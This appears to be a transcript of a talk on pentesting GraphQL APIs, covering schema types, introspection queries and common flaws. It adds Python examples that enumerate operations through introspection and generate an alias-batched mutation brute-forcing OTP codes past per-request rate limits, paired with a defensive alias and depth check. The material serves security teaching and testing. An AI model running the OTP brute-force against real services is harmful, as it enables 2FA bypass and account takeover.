Pentesting GraphQL APIs
Search
Arun
July 17, 2020
Technology
Transcript
graphql {
  GraphQL
  GraphQL Architecture
  REST Vs GraphQL
  GraphQL Schema
  Introspection Query
  GraphQL Vulnerabilities
  Pentesting Tools
  GraphQL in Action !!!
}
Ref: https://bit.ly/3hLZNO7
Ref: https://bit.ly/3fBQSNk
GraphQL Schema
• Query (type) - READ: for retrieving data/results, similar to GET in REST.
• Mutation (type) - WRITE: for modifications, like POST/PUT/DELETE operations in REST.
• Subscription (type) - EVENTS: for events/realtime updates.
Introspection Query: change the POST request into a GET request and append the payload from the links below to the endpoint URL.
https://pastebin.com/QyNaXVKg
https://pastebin.com/dFdsTaDQ
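The two slides above (the three root operation types, and sending the introspection query as GET or POST) come together in the script below. It is an added example, not code from the deck or from any GraphQL project: it builds the request in both forms, then parses an introspection response to list every query, mutation and subscription field with its argument types, which is the attack surface a pentester maps first. The endpoint URL, the `Query`/`Mutation`/`User` types and the response are all constructed for the example; the GET form only works when the server accepts queries on GET, and mutations must still be POSTed.

```python
import json
import urllib.parse

# Introspection query trimmed to what is needed to enumerate the three root
# operation types and every field (with argument names and types) under them.
INTROSPECTION_QUERY = """
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types {
      kind name
      fields { name args { name type { ...TypeRef } } type { ...TypeRef } }
    }
  }
}
fragment TypeRef on __Type {
  kind name ofType { kind name ofType { kind name ofType { kind name } } }
}
"""


def build_post_body(query):
    """JSON body for the usual POST form of a GraphQL request."""
    return json.dumps({"query": query, "variables": {}})


def build_get_url(endpoint, query):
    """Same document as a GET request: it goes in the ?query= parameter.
    Only works if the server accepts GET; mutations must still be POSTed."""
    return endpoint + "?" + urllib.parse.urlencode({"query": query})


def type_name(t):
    """Render an introspection __Type reference back into SDL, e.g. [User!]!."""
    if t["kind"] == "NON_NULL":
        return type_name(t["ofType"]) + "!"
    if t["kind"] == "LIST":
        return "[" + type_name(t["ofType"]) + "]"
    return t["name"]


def enumerate_operations(response):
    """Map each root operation type to the fields it exposes, rendered as
    'field(arg: Type, ...): ReturnType'. Raises ValueError when the server
    returned errors and no data, which is what a disabled introspection looks like."""
    if not response.get("data"):
        raise ValueError("introspection rejected: %s" % response.get("errors"))
    schema = response["data"]["__schema"]
    types = {t["name"]: t for t in schema["types"]}
    ops = {}
    for op in ("query", "mutation", "subscription"):
        root = schema.get(op + "Type")          # None when the schema has no such root type
        fields = []
        if root and root["name"] in types:
            for f in types[root["name"]].get("fields") or []:
                args = ", ".join("%s: %s" % (a["name"], type_name(a["type"]))
                                 for a in f.get("args") or [])
                sig = f["name"] + ("(%s)" % args if args else "")
                fields.append("%s: %s" % (sig, type_name(f["type"])))
        ops[op] = fields
    return ops


# Constructed sample introspection response (not captured from a real server).
def _ref(kind, name, of_type=None):
    return {"kind": kind, "name": name, "ofType": of_type}


SAMPLE_RESPONSE = {"data": {"__schema": {
    "queryType": {"name": "Query"},
    "mutationType": {"name": "Mutation"},
    "subscriptionType": None,
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            {"name": "user", "args": [{"name": "id", "type": _ref("NON_NULL", None, _ref("SCALAR", "ID"))}],
             "type": _ref("OBJECT", "User")},
            {"name": "users", "args": [], "type": _ref("LIST", None, _ref("OBJECT", "User"))},
        ]},
        {"kind": "OBJECT", "name": "Mutation", "fields": [
            {"name": "updateUser", "args": [
                {"name": "id", "type": _ref("NON_NULL", None, _ref("SCALAR", "ID"))},
                {"name": "role", "type": _ref("SCALAR", "String")}],
             "type": _ref("OBJECT", "User")},
        ]},
        {"kind": "OBJECT", "name": "User", "fields": [
            {"name": "id", "args": [], "type": _ref("SCALAR", "ID")},
            {"name": "role", "args": [], "type": _ref("SCALAR", "String")},
        ]},
        {"kind": "SCALAR", "name": "ID", "fields": None},
        {"kind": "SCALAR", "name": "String", "fields": None},
    ]}}}


if __name__ == "__main__":
    print(build_get_url("https://target.example/graphql", INTROSPECTION_QUERY)[:80] + "...")
    for op, fields in enumerate_operations(SAMPLE_RESPONSE).items():
        print(op, fields)
```

Run against a real endpoint by POSTing `build_post_body(INTROSPECTION_QUERY)` (or fetching `build_get_url(...)`) and feeding the JSON to `enumerate_operations`; a mutation such as `updateUser(id: ID!, role: String)` in the output is exactly the kind of field to test for mass assignment and IDOR next.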
GraphQL Vulnerabilities
• SQL Injection
• NoSQL Injection
• Access Control Related Issues
• Mass Assignment
• IDOR
• Bypassing 2FA/BruteForce Attacks
• DOS Attacks etc.
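Two items in that list, 2FA brute force and DoS, share one GraphQL-specific mechanic: a single HTTP request can carry many operations (via aliases) or an arbitrarily deep selection set. The example below is added here and is not from the deck; it shows the attacker's side (an alias-batched mutation that tries many OTP codes in one request, so a per-request rate limit never triggers) next to a defender's lexical pre-check that counts aliases and nesting depth before the document reaches the executor. The `verifyOtp` mutation, its arguments and the `{ success token }` selection are hypothetical; the pre-check does not expand fragment spreads, so it is a cheap first gate in front of the real validator and cost analysis, not a replacement for them.

```python
import re

_NAME = re.compile(r"[A-Za-z_]\w*")


def batched_mutation(mutation, fixed_args, brute_arg, candidates, selection):
    """One GraphQL document that calls `mutation` once per candidate value,
    each call under its own alias (a0, a1, ...). A rate limiter that counts
    HTTP requests sees one request; the resolver still runs once per alias."""
    fixed = "".join('%s: "%s", ' % (k, v) for k, v in fixed_args.items())
    calls = ['  a%d: %s(%s%s: "%s") %s' % (i, mutation, fixed, brute_arg, c, selection)
             for i, c in enumerate(candidates)]
    return "mutation {\n" + "\n".join(calls) + "\n}"


def analyze_document(doc, max_aliases=10, max_depth=6):
    """Lexical pre-check a server can run before parsing: counts aliases
    (NAME : NAME outside argument lists) and the deepest selection-set nesting.
    Fragment spreads are not expanded, so depth reached through fragments is
    not counted; use this as a first gate in front of the real validator."""
    no_strings = re.sub(r'"(?:\\.|[^"\\])*"', '""', doc)  # a colon inside a string is not an alias
    tokens = re.findall(r"\$?[A-Za-z_]\w*|\S", no_strings)
    paren = depth = deepest = aliases = 0
    for i, tok in enumerate(tokens):
        if tok == "(":
            paren += 1
        elif tok == ")":
            paren -= 1
        elif tok == "{":
            depth += 1
            deepest = max(deepest, depth)
        elif tok == "}":
            depth -= 1
        elif (tok == ":" and paren == 0 and 0 < i < len(tokens) - 1
              and _NAME.fullmatch(tokens[i - 1]) and _NAME.fullmatch(tokens[i + 1])):
            aliases += 1  # argument and variable colons sit inside parentheses and are skipped
    return {"aliases": aliases, "depth": deepest,
            "allowed": aliases <= max_aliases and deepest <= max_depth}


if __name__ == "__main__":
    # Hypothetical verifyOtp mutation; the OTP candidates are constructed test values.
    doc = batched_mutation("verifyOtp", {"username": "alice"}, "code",
                           ["%04d" % n for n in range(50)], "{ success token }")
    print(doc.splitlines()[1])
    print(analyze_document(doc))
```

The same `analyze_document` check catches the nested-query DoS shape (`{ a { b { c ... } } }`) through its depth counter; production servers should pair such a gate with a depth/complexity limit inside the GraphQL library and with rate limiting that counts operations, not HTTP requests.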